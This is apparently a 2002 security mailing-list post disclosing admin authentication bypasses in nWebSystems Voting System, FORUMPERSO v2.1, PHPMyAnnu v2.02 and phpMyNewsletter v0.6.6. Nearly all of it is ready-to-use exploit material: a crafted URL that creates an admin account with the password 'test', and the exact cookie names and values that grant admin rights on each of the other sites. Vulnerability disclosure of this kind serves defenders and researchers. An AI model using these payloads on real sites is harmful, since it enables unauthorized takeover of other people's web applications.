The url http://www.host.com/index.php?loggedin=true&action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save allow to create an admin access (nick : test, password : test) on a nWebSystems Voting System site. More details in french : http://balteam.multimania.com/Tuts/nwebsystemsvs.txt FORUMPERSO v2.1 : Anyone can be admin if he send the cookies "pass_ok[0]","1" and "pass_ok[1]","admin" to the page http://www.host.com/connect.php3?id_forum=&addr=install.php3. PHPMyAnnu v2.02 : Anyone can be admin if he send the cookie "phpmyannu_admin_ok","yes" to the page http://www.host.com/path/admin/admin.php3. phpMyNewsletter v0.6.6 : Anyone can be admin if he send the cookie "adminnews","true" to the page http://www.host.com/admin.php3. More details in french : http://balteam.multimania.com/Tuts/4cookieholes.txt frog-m@n _________________________________________________________________ Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp.
This archive was generated by hypermail 2b30 : Mon Feb 11 2002 - 10:21:57 PST